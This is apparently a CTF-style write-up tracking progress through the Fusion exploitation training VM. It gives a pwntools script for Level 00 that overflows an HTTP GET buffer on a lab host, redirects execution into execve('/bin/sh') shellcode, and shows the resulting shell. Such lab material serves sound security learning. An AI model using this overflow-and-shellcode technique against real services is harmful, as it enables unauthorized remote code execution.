目前进度：

• Level 00
• Level 01
• Level 02
• Level 03
• Level 04
• Level 05
• Level 06
• Level 07
• Level 08
• Level 09
• Level 10
• Level 11
• Level 12
• Level 13
• Level 14

Level 00

#!/usr/bin/python
from pwn import *
import struct

shellcode = '\xb8\x2f\x73\x68\xf0\x25\xff\xff\xff\x0f\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\xb0\x0b\x31\xc9\x31\xd2\xcd\x80'
prefix='GET '
postfix=' HTTP/1.1' 

r=remote('192.168.116.150', 20000)
r.recvuntil('er is at')
addr=int(r.recv()[0:11],16)
#print addr,hex(addr)
print hex(addr+200)
r.sendline(prefix+'G'*139+p32(addr+200)+postfix+'\x90'*100+shellcode)
r.interactive()

root@kali:~/Documents/Fusion# ./level00.py 
[+] Opening connection to 192.168.116.150 on port 20000: Done
0xbffff9c0
[*] Switching to interactive mode
$ id
uid=20000 gid=20000 groups=20000